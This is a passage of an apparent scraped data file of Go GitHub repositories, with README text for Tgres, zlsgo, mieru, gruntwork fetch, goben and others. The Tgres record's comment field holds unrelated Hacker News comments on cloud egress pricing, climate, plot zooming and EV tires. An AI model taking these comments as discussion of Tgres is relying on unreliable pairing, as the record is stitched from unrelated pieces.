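Because the storage is plain PostgreSQL, you can peek at the stored series from any client, or from Go itself with nothing but database/sql. The sketch below is only illustrative: the connection string is made up, the lib/pq driver is one arbitrary choice, and only the default view name tv mentioned above is taken from Tgres, so no particular column layout is assumed:\n\n```go\npackage main\n\nimport (\n    \"database/sql\"\n    \"fmt\"\n    \"log\"\n\n    _ \"github.com/lib/pq\" // PostgreSQL driver\n)\n\nfunc main() {\n    db, err := sql.Open(\"postgres\", \"postgres://tgres:secret@localhost/tgres?sslmode=disable\")\n    if err != nil {\n        log.Fatal(err)\n    }\n    defer db.Close()\n\n    // Read a few rows from the default time series view without assuming its schema.\n    rows, err := db.Query(\"SELECT * FROM tv LIMIT 5\")\n    if err != nil {\n        log.Fatal(err)\n    }\n    defer rows.Close()\n\n    cols, err := rows.Columns()\n    if err != nil {\n        log.Fatal(err)\n    }\n    fmt.Println(cols)\n\n    // Scan each row into a generic slice so the example works with any column set.\n    vals := make([]interface{}, len(cols))\n    ptrs := make([]interface{}, len(cols))\n    for i := range vals {\n        ptrs[i] = &vals[i]\n    }\n    for rows.Next() {\n        if err := rows.Scan(ptrs...); err != nil {\n            log.Fatal(err)\n        }\n        fmt.Println(vals...)\n    }\n}\n```\n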
For a more detailed description of\nhow Tgres stores data see this\n[article](https://grisha.org/blog/2017/01/21/storing-time-seris-in-postgresql-optimize-for-write/)\n\n### Current Status\n\nFeb 7 2018: This project is not actively maintained. You may find\nquite a bit of time-series wisdom here, but there are probably still a\nlot of bugs.\n\nJul 5 2017: See this [status update](https://grisha.org/blog/2017/07/04/tgres-status-july-2017/)\n\nJun 15 2017: Many big changes since March, most notably data point\nversioning and instoduction of ds_state and rra_state tables which\ncontain frequently changed attributes as arrays, similar to the way\ndata points are stored eliminating the need to update ds and rra\ntables, these are now essentially immutable. Ability to delete series\nwith NOTIFY to Tgres to purge it from the cache.\n\nMar 22 2017: Version 0.10.0b was tagged. This is our first beta (which\nis more stable than alpha). Please try it out, and take a minute to\nopen an issue or even a PR if you see/fix any problems. Your feedback\nis most appreciated!\n\nFeb 2017 Note: A major change in the database structure has been made,\nTgres now uses the \"write optimized\" / \"vertical\" storage. This change\naffected most of the internal code, and as far overall status, it set\nus back a bit, all tests are currently broken, but on the bright side,\nwrite performance is amazing now.\n\nPhase 1 or proof-of-concept for the project is the ability to (mostly)\nact as a drop-in replacement for Graphite (except for chart\ngeneration) and Statsd. Currently Tgres supports nearly all of\nGraphite functions.\n\nAs of Aug 2016 Tgres is feature-complete for phase 1, which means that\nthe development will focus on tests, documentation and stability for a\nwhile.\n\nTgres is not ready for production use, but is definitely stable enough\nfor tinkering for those interested.\n\n### Getting Started\n\nYou need a newer Go (1.7+) and PostgreSQL 9.5 or later. To get the\ndaemon compiled all you need is:\n\n```\n$ go get github.com/tgres/tgres\n```\n\nNow you should have a tgres binary in `$GOPATH/bin`.\n\nThere is also a Makefile which lets you build Tgres with `make` which\nwill use a slightly more elaborate command and the resulting tgres\nbinary will be able to report its build time and git revision, but\notherwise it's the same.\n\nLook in `$GOPATH/src/github.com/tgres/tgres/etc` for a sample config\nfile. Make a copy of this file and edit it, at the very least check\nthe `db-connect-string` setting. Also check `log-file` directory, it\nmust be writable.\n\nThe user of the PostgreSQL database needs CREATE TABLE permissions. On\nfirst run tgres will create three tables (ds, rra and ts) and two\nviews (tv and tvd).\n\nTgres is invoked like this:\n```\n$ $GOPATH/bin/tgres -c /path/to/config\n```\n\n### For Developers\n\nThere is nothing specific you need to know. If you'd like to submit a\nbug fix, or for anything else - use Github.\n\n### Migrating Graphite Data\n\nIncluded in cmd/whisper_import is a program that can copy whisper data\ninto Tgres, its command-line arguments are self-explanatory. You\nshould be able to start sending data to Tgres and then migrate your\nGraphite data retroactively by running whisper_import to avoid gaps in\ndata. 
It's probably a good idea to test a small subset of series first,\nmigrations can be time consuming and resource-intensive.\n", "readme_type": "markdown", "hn_comments": "I think Cloudflare has been successful somewhat at making AWS improve transfer pricing.Cheap data transfer attracts trouble, however. 10 cents a gigabyte is much cheaper than buying a CD or DVD, but pirates like to pirate 10x or 100x more than they could ever buy so I think it slows people down.Circa 2000 when Napster and Limewire were big, Cornell University dealt with it by putting a usage cap on undergraduate IPs and charging for data over the cap. There are some kids who will have their parents pay a few $1000 of parking tickets and data transfer a semester on their bursar bill but it sure slowed the others down.Egress pricing is crazy, but I don't know that it's anti-competitive? I don't think it fits the definition of tying, because you egress isn't unrelated to the other services.There's certainly a lot of margin in their egress pricing, and that may allow them to operate portions of their service with smaller margins, and maybe that's anti-competitive, but it's not like any of their services are low cost, so I don't think there's really a case that they're dumping and using bandwidth to cover it. Everything is expensive. There's no law against that.If you have enough egress, and you can't negotiate better pricing (which is an option!), you should probably consider AWS direct connect (or similar) and send your egress out through cheaper transit elsewhere.The bandwidth alliance (https://www.cloudflare.com/bandwidth-alliance/) seems to be trying to do something about this, and build an ecosystem of companies that don't charge for egress to others. Presumably this is backed by legitimate open peering in internet exchanges, rather than metered links.I believe there are some challengers in this group like backblaze, wasabi, oracle cloud etc.Data-driven predictions of the time remaining until critical global warming thresholds are reachedhttps://www.pnas.org/doi/10.1073/pnas.2207183120If another asteroid hits the earth on the scale of the Chicxulub Event, wonder how that would affect the model.Does JSXGraph have this behavior?Maybe you can \"fake\" render the canvas, but what happens to the actual plot graph? Do you see fp artifacts there?eventually bandaid-ed it by preventing further zooming based on current precision zoom = {\n fac ctr min max -> newMin newMax\n newMin = \n | eps < 2^(-2^11) = min\n | eps > 2^( 2^11) = min\n | avg/eps > 2^52 = min\n | otherwise = (min-ctr)*fac + ctr\n newMax =\n | eps < 2^(-2^11) = max\n | eps > 2^( 2^11) = max\n | avg/eps > 2^25 = max\n | otherwise = (max-ctr)*fac + ctr\n avg = (max+min)/2\n eps = (max-min)/2\n }I don't have an answer to which VPS providers still have the feature to disable a VM at a certain bw usage. The only thing I can add is that this behavior can be accomplished on any node running Linux by using one of the bandwidth related modules such as quota. [1] One advantage of using IPTables to do this is that one can enforce it on any or multiple ports [2] but exclude your management ports such as SSHD. The next matching rule could be a tcp-reset only responding to your automation so that it knows to take that node out of any pools one has defined.[1] - https://ipset.netfilter.org/iptables-extensions.man.html#lbB...[2] - https://ipset.netfilter.org/iptables-extensions.man.html#lbB...The only reason I stick with scaleway. 
No direct data charges.> Because most electric motors deliver enormous torque more aggressively and instantaneously than most combustion engines, they send a more significant shock to the tire than nearly any ICE car with a similar design brief canThe part I don\u2019t get is that, couldn\u2019t the manufacturer change the motor controller to hold back torque when accelerating? It would seem that life cycle costs could be reduced with a design change in software or firmware.Aside from initial purchase price, more expensive tires are the other thing working against total lifetime cost of EV's vs ICE vehicles. More than offset by all the other savings on gas, maintenance, repairs, moving part replacements, fluids, brakes, time wasted stopping at gas stations, etc.So what happens when you apply the brakes? Don't similar displacement forces occur to the tires? Are they saying that it doesn't apply here for non-EV vehicles?- heavier- higher torque- tire noise more noticable without engine nose- want lower rolling resistance for efficiency", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sohaha/zlsgo", "link": "https://github.com/sohaha/zlsgo", "tags": ["golang", "go-framework", "web", "cli"], "stars": 505, "description": "\u7b80\u5355\u6613\u7528\u3001\u8db3\u591f\u8f7b\u91cf\u3001\u6027\u80fd\u597d\u7684 Golang \u5e93 - Easy to use, light enough, good performance Golang library", "lang": "Go", "repo_lang": "", "readme": "[English](./README.EN.md) | \u7b80\u4f53\u4e2d\u6587\n\n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat)](https://pkg.go.dev/github.com/sohaha/zlsgo?tab=subdirectories)\n![flat](https://img.shields.io/github/languages/top/sohaha/zlsgo.svg?style=flat)\n[![UnitTest](https://github.com/sohaha/zlsgo/actions/workflows/go.yml/badge.svg)](https://github.com/sohaha/zlsgo/actions/workflows/go.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sohaha/zlsgo)](https://goreportcard.com/report/github.com/sohaha/zlsgo)\n[![codecov](https://codecov.io/gh/sohaha/zlsgo/branch/master/graph/badge.svg)](https://codecov.io/gh/sohaha/zlsgo)\n\n![luckything](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa4bcc6b2-32ef-4a7d-ba1c-65a0330f632d%2Flogo.png?table=block&id=37f366ec-0593-4a21-94c0-c24023a85354&width=590&cache=v2)\n\n## \u6587\u6863\n\n[\u67e5\u770b\u6587\u6863](https://docs.73zls.com/zls-go/#)\n\n\u5efa\u8bae\u642d\u914d [zzz](https://github.com/sohaha/zzz) \u7684 `zzz watch` \u6307\u4ee4\u4f7f\u7528\n\n## \u7279\u6027\n\n\u7b80\u5355\u6613\u7528\u3001\u8db3\u591f\u8f7b\u91cf\uff0c\u907f\u514d\u8fc7\u591a\u7684\u5916\u90e8\u4f9d\u8d56\uff0c\u6700\u4f4e\u517c\u5bb9 Window 7 \u7b49\u8001\u7cfb\u7edf\n\n## \u5feb\u901f\u4e0a\u624b\n\n### \u5b89\u88c5\n\n```bash\n$ go get github.com/sohaha/zlsgo\n```\n\n### HTTP \u670d\u52a1\n\n```go\n// main.go\npackage main\n\nimport (\n \"github.com/sohaha/zlsgo/znet\"\n)\n\nfunc main(){\n // \u83b7\u53d6\u4e00\u4e2a\u5b9e\u4f8b\n r := znet.New()\n\n // \u6ce8\u518c\u8def\u7531\n r.GET(\"/hi\", func(c *znet.Context) {\n c.String(200, \"Hello world\")\n })\n // \u9690\u6027\u8def\u7531\uff08\u7ed3\u6784\u4f53\u7ed1\u5b9a\uff09\u8bf7\u53c2\u8003\u6587\u6863\n // \u542f\u52a8\n 
znet.Run()\n}\n```\n\n![znet](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1d7f2372-5d58-4848-85ca-1bedf8ad14ae%2FUntitled.png?table=block&id=18fdfaa9-5dab-4cb8-abb3-f19ff37ed3f0&width=2210&userId=&cache=v2)\n\n### \u65e5\u5fd7\u5de5\u5177\n\n```go\npackage main\n\nimport (\n \"github.com/sohaha/zlsgo/zlog\"\n)\n\nfunc main(){\n logs := []string{\"\u8fd9\u662f\u4e00\u4e2a\u6d4b\u8bd5\",\"\u8fd9\u662f\u4e00\u4e2a\u9519\u8bef\"}\n zlog.Debug(logs[0])\n zlog.Error(logs[1])\n zlog.Dump(logs)\n // zlog...\n}\n```\n\n![zlog](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fd8cc2527-8d9d-466c-b5c8-96e706ee0691%2FUntitled.png?table=block&id=474726aa-05fd-47ba-b270-59017c59817b&width=2560&cache=v2)\n\n### HTTP \u5ba2\u6237\u7aef\n\n```go\n// main.go\npackage main\n\nimport (\n \"github.com/sohaha/zlsgo/zhttp\"\n \"github.com/sohaha/zlsgo/zlog\"\n)\n\nfunc main(){\n data, err := zhttp.Get(\"https://github.com\")\n if err != nil {\n zlog.Error(err)\n return\n }\n res := data.String()\n zlog.Debug(res)\n\n}\n```\n\n### \u66f4\u591a\u529f\u80fd\n\n\u8bf7\u9605\u8bfb\u6587\u6863 [https://docs.73zls.com/zls-go/#](https://docs.73zls.com/zls-go/#)\n\n## Todo\n\n- [x] HTTP \u670d\u52a1\u7aef\n- [x] Http \u5ba2\u6237\u7aef\n- [x] JSON RPC\n- [x] \u65e5\u5fd7\u529f\u80fd\n- [x] Json \u5904\u7406\n- [x] \u5b57\u7b26\u4e32\u5904\u7406\n- [x] \u9a8c\u8bc1\u5668\n- [x] \u70ed\u91cd\u542f\n- [x] \u5b88\u62a4\u8fdb\u7a0b\n- [x] \u5f02\u5e38\u4e0a\u62a5\n- [x] \u7ec8\u7aef\u5e94\u7528\n- [x] \u534f\u7a0b\u6c60\n- [x] HTML \u89e3\u6790\n- [x] \u4f9d\u8d56\u6ce8\u5165\n- [x] Server Sent \u63a8\u9001\n- [ ] [\u6570\u636e\u5e93\u64cd\u4f5c](https://github.com/sohaha/zdb)\n- [ ] ...\n\n## LICENSE\n\n[MIT](LICENSE)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "networkservicemesh/networkservicemesh", "link": "https://github.com/networkservicemesh/networkservicemesh", "tags": ["networking", "service-mesh", "kubernetes", "cloud-native", "nsm", "cncf"], "stars": 505, "description": "The Hybrid/Multi-cloud IP Service Mesh", "lang": "Go", "repo_lang": "", "readme": "# Archived\n\nThis repo has been archived. 
Network Service Mesh continues to be [very actively developed](https://networkservicemesh.devstats.cncf.io/d/2/commits-repository-groups?orgId=1&var-period=w&var-repogroups=All&from=now-1y&to=now)\nin [multiple repos](https://networkservicemesh.io/community#developer-resources).\n\n## What is Network Service Mesh\n\nNetwork Service Mesh (NSM) is the Hybrid/Multi-cloud IP Service Mesh.\n\nFor more information, have a look at our [website](https://networkservicemesh.io/)\n\n## Getting started\n\nGet Started with our [latest release](https://networkservicemesh.io/docs/releases/v1.0.0/)\n\n## Docs\n\n[Documentation can be found on our website](https://networkservicemesh.io/docs/concepts/enterprise_users/)\n\n## Get involved\n\nInformation on getting involved: meetings, slack, etc can be found on our [commmunity page](https://networkservicemesh.io/community)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gansidui/gotcp", "link": "https://github.com/gansidui/gotcp", "tags": [], "stars": 505, "description": "A Go package for quickly building tcp servers", "lang": "Go", "repo_lang": "", "readme": "gotcp\n================\n\nA Go package for quickly building tcp servers\n\n\nUsage\n================\n\n### Install\n\n~~~\ngo get github.com/gansidui/gotcp\n~~~\n\n\n### Examples\n\n* [echo](https://github.com/gansidui/gotcp/tree/master/examples/echo)\n* [telnet](https://github.com/gansidui/gotcp/tree/master/examples/telnet)\n\nDocument\n================\n\n[Doc](http://godoc.org/github.com/gansidui/gotcp)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "enfein/mieru", "link": "https://github.com/enfein/mieru", "tags": ["network", "tunnel", "proxy", "socks5", "shadowsocks", "v2ray", "trojan"], "stars": 505, "description": "\u898b\u3048\u308b\u662f\u4e00\u6b3e socks5 / HTTP / HTTPS \u7f51\u7edc\u4ee3\u7406\u7ffb\u5899\u5de5\u5177\u3002mieru is a socks5 / HTTP / HTTPS proxy to bypass censorship.", "lang": "Go", "repo_lang": "", "readme": "# \u89c1\u3048\u308b / mieru\n\n[![Build Status](https://github.com/enfein/mieru/actions/workflows/ci.yaml/badge.svg)](https://github.com/enfein/mieru/actions/workflows/ci .yaml)\n[![Releases](https://img.shields.io/github/release/enfein/mieru/all.svg?style=flat)](https://github.com/enfein/mieru/releases)\n[![LICENSE](https://img.shields.io/github/license/enfein/mieru.svg?style=flat)](https://github.com/enfein/mieru/blob/main/LICENSE)\n\nmieru\u3010\u89c1\u3048\u308b\u3011is a safe, non-traffic feature, difficult to detect actively, socks5 / HTTP / HTTPS network proxy software based on TCP or UDP protocol.\n\nThe mieru proxy software consists of two parts: the client software called mieru \u3010\u89c1\u3048\u308b\u3011 and the proxy server software called mita \u3010\u89c1\u305f\u3011.\n\n## Principles and protocols\n\nMieru's over-the-wall principle is similar to software such as shadowsocks / v2ray, and an encrypted channel is established between the client and the proxy server outside the wall. GFW cannot decipher the encrypted transmission information, and cannot determine the URL you finally visit, so you can only choose to let it go.\n\nFor an explanation of the mieru protocol, please refer to [mieru proxy protocol](https://github.com/enfein/mieru/blob/main/docs/protocol.zh_CN.md).\n\n## Features\n\n1. 
Use high-strength AES-256-GCM encryption algorithm to generate keys based on username, password and system time. With existing computing power, the data content transmitted by mieru cannot be cracked.\n2. mieru realizes the complete encryption of all transmitted content between the client and the proxy server, and does not transmit any plaintext information. A network observer (such as a GFW) can only know the time, the address where the packet was sent and received, and the size of the packet. In addition, observers cannot obtain any other traffic information.\n3. When mieru sends a packet, it will fill with random information at the end. Even if the same content is transmitted, the packet size is different.\n4. When using UDP transmission protocol, mieru can send data directly without handshaking between client and server.\n5. When the server cannot decrypt the data sent by the client, nothing will be returned. It is difficult for GFW to discover mieru services through active probing.\n6. Mieru supports multiple users to share the proxy server.\n7. Mieru supports both IPv4 and IPv6.\n8. mieru provides socks5, HTTP and HTTPS proxy.\n9. The client software supports Windows, Mac OS, Linux and Android systems. Android users please use version 0.8.1-rc02 or above SagerNet client and install version 1.6.1 or above mieru plugin.\n10. If you need advanced functions such as global proxy or custom routing rules, you can use mieru as the backend of proxy platforms such as clash.\n\n## Tutorial\n\n1. [Server installation and configuration](https://github.com/enfein/mieru/blob/main/docs/server-install.zh_CN.md)\n2. [Client installation and configuration](https://github.com/enfein/mieru/blob/main/docs/client-install.zh_CN.md)\n3. [Operation maintenance and troubleshooting](https://github.com/enfein/mieru/blob/main/docs/operation.zh_CN.md)\n4. [Over the wall security guide](https://github.com/enfein/mieru/blob/main/docs/security.zh_CN.md)\n\n## compile\n\nCompile mieru's client and server software, it is recommended to do it on a Linux system. The compilation process may need to download dependent software packages over the wall.\n\nThe software required for compilation includes:\n\n-curl\n-env\n- git\n- go (version >= 1.19)\n- make\n-sha256sum\n-tar\n- zip\n\nCompiling the debian installation package requires:\n\n- dpkg-deb\n-fakeroot\n\nCompiling the RPM installation package requires:\n\n-rpmbuild\n\nWhen compiling, enter the project root directory and call the command `make`. 
The compilation result will be stored in the `release` folder in the project root directory.\n\n## Contact the author\n\nIf you have any questions about this project, please submit a GitHub Issue to contact us.\n\n## License\n\nUse of this software requires compliance with the GPL-3 agreement.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gruntwork-io/fetch", "link": "https://github.com/gruntwork-io/fetch", "tags": ["github", "downloader", "git"], "stars": 504, "description": "Download files, folders, and release assets from a specific git commit, branch, or tag of public and private GitHub repos.", "lang": "Go", "repo_lang": "", "readme": "[![Maintained by Gruntwork.io](https://img.shields.io/badge/maintained%20by-gruntwork.io-%235849a6.svg)](https://gruntwork.io/?ref=repo_fetch)\n# fetch\n\nfetch makes it easy to download files, folders, or release assets from a specific commit, branch, or tag of\na public or private GitHub repo.\n\n#### Motivation\n\n[Gruntwork](http://gruntwork.io) helps software teams get up and running on AWS with DevOps best practices and\nworld-class infrastructure in about a day. Sometimes we publish scripts and binaries that clients use in their\ninfrastructure, and we want an easy way to install a specific version of one of those scripts and binaries. While this\nis fairly straightforward to do with public GitHub repos, as you can usually `curl` or `wget` a public URL, it's much\ntrickier to do with private GitHub repos, as you have to make multiple API calls, parse JSON responses, and handle\nauthentication. Fetch makes it possible to handle all of these cases with a one-liner.\n\n#### Features\n\n- Download from any git reference, such as a specific git tag, branch, or commit SHA.\n- Download a single file, a subset of files, or all files from the repo.\n- Download one or more binary assets from a specific release that match a regular expression.\n- Verify the SHA256 or SHA512 checksum of a binary asset.\n- Download from public repos, or from private repos by specifying a [GitHub Personal Access Token](https://help.github.com/articles/creating-an-access-token-for-command-line-use/).\n- Download from GitHub Enterprise.\n- When specifying a git tag, you can specify either exactly the tag you want, or a [Tag Constraint\n Expression](#tag-constraint-expressions) to do things like \"get the latest non-breaking version\" of this repo. 
Note that fetch assumes git tags are specified according to [Semantic Versioning](http://semver.org/) principles.\n\n#### Quick examples\n\nDownload folder `/baz` from tag `0.1.3` of a GitHub repo and save it to `/tmp/baz`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"0.1.3\" --source-path=\"/baz\" /tmp/baz\n```\n\nDownload a release asset matching named `foo.exe` from release `0.1.5` and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"0.1.5\" --release-asset=\"foo.exe\" /tmp\n```\n\nDownload all release assets matching the regular expression, `foo_linux-.*` from release `0.1.5` and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"0.1.5\" --release-asset=\"foo_linux-.*\" /tmp\n```\n\nSee more examples in the [Examples section](#examples).\n\n## Installation\n\n### Download from releases page\n\nDownload the fetch binary from the [GitHub Releases](https://github.com/gruntwork-io/fetch/releases) tab.\n\n### Install via package manager\n\nNote that package managers are third party. The third party fetch packages may not be updated with the latest version, but are often close. Please check your version against the latest available on the [releases page](https://github.com/gruntwork-io/fetch/releases). If you want the latest version, the recommended installation option is to [download from the releases page](https://github.com/gruntwork-io/fetch/releases).\n\n- **macOS:** You can install fetch using [Homebrew](https://brew.sh/): `brew install fetch`. \n\n- **Linux:** Most Linux users can use [Homebrew](https://docs.brew.sh/Homebrew-on-Linux): `brew install fetch`.\n\n## Usage\n\n#### Assumptions\n\nfetch assumes that a repo's tags are in the format `vX.Y.Z` or `X.Y.Z` to support Semantic Versioning parsing. This allows you to specify a [Tag Constraint Expression](#tag-constraint-expressions) to do things like \"get the latest non-breaking version\" of this repo. Note that fetch also allows downloading a specific tag not in SemVer format.\n\n#### General Usage\n\n```\nfetch [OPTIONS] \n```\n\nThe supported options are:\n\n- `--repo` (**Required**): The fully qualified URL of the GitHub repo to download from (e.g. https://github.com/foo/bar).\n- `--ref` (**Optional**): The git reference to download. If specified, will override `--commit`, `--branch`, and `--tag`.\n- `--tag` (**Optional**): The git tag to download. Can be a specific tag or a [Tag Constraint\n Expression](#tag-constraint-expressions).\n- `--branch` (**Optional**): The git branch from which to download; the latest commit in the branch will be used. If\n specified, will override `--tag`.\n- `--commit` (**Optional**): The SHA of a git commit to download. If specified, will override `--branch` and `--tag`.\n- `--source-path` (**Optional**): The source path to download from the repo (e.g. `--source-path=/folder` will download\n the `/folder` path and all files below it). By default, all files are downloaded from the repo unless `--source-path`\n or `--release-asset` is specified. This option can be specified more than once.\n- `--release-asset` (**Optional**): A regular expression matching release assets--these are binary files uploaded to a [GitHub\n Release](https://help.github.com/articles/creating-releases/)--to download. It only works with the `--tag` option.\n- `--release-asset-checksum` (**Optional**): The checksum that a release asset should have. 
Fetch will fail if this value\n is non-empty and does not match the checksum computed by Fetch, or if more than 1 assets are matched by the release-asset\n regular expression.\n- `--release-asset-checksum-algo` (**Optional**): The algorithm fetch will use to compute a checksum of the release asset.\n Supported values are `sha256` and `sha512`.\n- `--github-oauth-token` (**Optional**): A [GitHub Personal Access\n Token](https://help.github.com/articles/creating-an-access-token-for-command-line-use/). Required if you're\n downloading from private GitHub repos. **NOTE:** fetch will also look for this token using the `GITHUB_OAUTH_TOKEN`\n environment variable, which we recommend using instead of the command line option to ensure the token doesn't get\n saved in bash history.\n- `--github-api-version` (**Optional**): Used when fetching an artifact from a GitHub Enterprise instance.\n Defaults to `v3`. This is ignored when fetching from GitHub.com.\n- `--progress` (**Optional**): Used when fetching a big file and want to see progress on the fetch.\n\nThe supported arguments are:\n\n- `` (**Required**): The local path where all files should be downloaded (e.g. `/tmp`).\n\nRun `fetch --help` to see more information about the flags.\n\n#### Tag Constraint Expressions\n\nThe value of `--tag` can be expressed using any operators defined in [hashicorp/go-version](https://github.com/hashicorp/go-version).\n\nSpecifically, this includes:\n\n| Tag Constraint Pattern | Meaning |\n| -------------------------- | ---------------------------------------- |\n| `1.0.7` | Exactly version `1.0.7` |\n| `=1.0.7` | Exactly version `1.0.7` |\n| `!=1.0.7` | The latest version as long as that version is not `1.0.7` |\n| `>1.0.7` | The latest version greater than `1.0.7` |\n| `<1.0.7` | The latest version that's less than `1.0.7` |\n| `>=1.0.7` | The latest version greater than or equal to `1.0.7` |\n| `<=1.0.7` | The latest version that's less than or equal to `1.0.7` |\n| `~>1.0.7` | The latest version that is greater than `1.0.7` and less than `1.1.0` |\n| `~>1.0` | The latest version that is greater than `1.0` and less than `2.0` |\n\n## Examples\n\n#### Usage Example 1\n\nDownload `/modules/foo/bar.sh` from a GitHub release where the tag is the latest version of `0.1.x` but at least `0.1.5`, and save it to `/tmp/bar`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --tag=\"~>0.1.5\" --source-path=\"/modules/foo/bar.sh\" /tmp/bar\n```\n\n#### Usage Example 2\n\nDownload all files in `/modules/foo` from a GitHub release where the tag is exactly `0.1.5`, and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"0.1.5\" --source-path=\"/modules/foo\" /tmp\n```\n\n#### Usage Example 3\n\nDownload all files from a private GitHub repo using the GitHUb oAuth Token `123`. 
Get the release whose tag is exactly `0.1.5`, and save the files to `/tmp`:\n\n```\nGITHUB_OAUTH_TOKEN=123\n\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"0.1.5\" /tmp\n```\n\n#### Usage Example 4\n\nDownload all files from the latest commit on the `sample-branch` branch, and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"sample-branch\" /tmp\n```\n\n#### Usage Example 5\n\nDownload all files from the git commit `f32a08313e30f116a1f5617b8b68c11f1c1dbb61`, and save them to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"f32a08313e30f116a1f5617b8b68c11f1c1dbb61\" /tmp\n```\n\n#### Usage Example 6\n\nDownload the release asset `foo.exe` from a GitHub release where the tag is exactly `0.1.5`, and save it to `/tmp`:\n\n```\nfetch --repo=\"https://github.com/foo/bar\" --ref=\"0.1.5\" --release-asset=\"foo.exe\" /tmp\n```\n\n#### Usage Example 7\n\nDownload the release asset `foo.exe` from a GitHub release hosted on a GitHub Enterprise instance running at `ghe.mycompany.com` where the tag is exactly `0.1.5`, and save it to `/tmp`:\n\n```\nfetch --repo=\"https://ghe.mycompany.com/foo/bar\" --ref=\"0.1.5\" --release-asset=\"foo.exe\" /tmp\n```\n\n##### Release Instructions\n\nTo release a new version of `fetch`, go to the [Releases page](https://github.com/gruntwork-io/fetch/releases) and \"Draft a new release\".\nOn the following page, bump the \"Tag version\" appropriately, and set the \"Release title\" to be the same.\nIn the \"Describe this release\" section, log the changes of this release, linking back to issues that were addressed.\nClick the \"Publish release\" button. CircleCI will pick this up, generate the assets, and attach them to the release.\n\n## License\n\nThis code is released under the MIT License.
See [LICENSE.txt](/LICENSE.txt).\n\n## TODO\n\n- Introduce code verification using something like GPG signatures or published checksums\n- Explicitly test for exotic repo and org names\n- Apply stricter parsing for repo-filter command-line arg", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "udhos/goben", "link": "https://github.com/udhos/goben", "tags": ["golang", "go", "networking", "benchmarking", "tool", "tcp", "performance-testing", "udp", "bandwidth", "measure-tcp-throughput", "throughput"], "stars": 504, "description": "goben is a golang tool to measure TCP/UDP transport layer throughput between hosts.", "lang": "Go", "repo_lang": "", "readme": "[![license](http://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/udhos/goben/blob/master/LICENSE)\n[![Go Report Card](https://goreportcard.com/badge/github.com/udhos/goben)](https://goreportcard.com/report/github.com/udhos/goben)\n[![GolangCI](https://golangci.com/badges/github.com/udhos/goben.svg)](https://golangci.com/r/github.com/udhos/goben)\n\n# goben\n\ngoben is a golang tool to measure TCP/UDP transport layer throughput between hosts.\n\n* [Features](#features)\n* [History](#history)\n* [Requirements](#requirements)\n* [Install](#install)\n * [With Go Modules (since Go 1\\.11)](#with-go-modules-since-go-111)\n * [Without Go Modules (before Go 1\\.11)](#without-go-modules-before-go-111)\n* [Usage](#usage)\n* [Command\\-line Options](#command-line-options)\n* [Example](#example)\n* [TLS](#tls)\n\nCreated by [gh-md-toc](https://github.com/ekalinin/github-markdown-toc.go)\n\n# Features\n\n- Support for TCP, UDP, TLS.\n- Can limit maximum bandwidth.\n- Written in [Go](https://golang.org/). Single executable file. No runtime dependency.\n- Simple usage: start the server then launch the client pointing to server's address.\n- Spawns multiple concurrent lightweight goroutines to handle multiple parallel traffic streams.\n- Can save test results as PNG chart.\n- Can export test results as YAML or CSV.\n\n# History\n\n- Years ago out of frustration with [iperf2](https://sourceforge.net/projects/iperf2/) limitations, I wrote the [nepim](http://www.nongnu.org/nepim/) tool. One can find some known iperf problems here: [iperf caveats](https://support.cumulusnetworks.com/hc/en-us/articles/216509388-Throughput-Testing-and-Troubleshooting#network_testing_with_open_source_tools). Nepim was more customizable, easier to use, reported simpler to understand results, was lighter on CPU.\n- Later I found another amazing tool called [nuttcp](https://www.nuttcp.net/). One can read about nepim and nuttcp here: [nepim and nuttcp](https://www.linux.com/news/benchmarking-network-performance-network-pipemeter-lmbench-and-nuttcp).\n- [goben](https://github.com/udhos/goben) is intended to fix shortcomings of nepim: (1) Take advantage of multiple CPUs while not wasting processing power. Nepim was single-threaded. (2) Be easily portable to multiple platforms. Nepim was heavily tied to UNIX-like world. (3) Use a simpler synchronous code flow. Nepim used hard-to-follow asynchronous architecture.\n\n# Requirements\n\n- You need a [system with the Go language](https://golang.org/dl/) in order to build the application. 
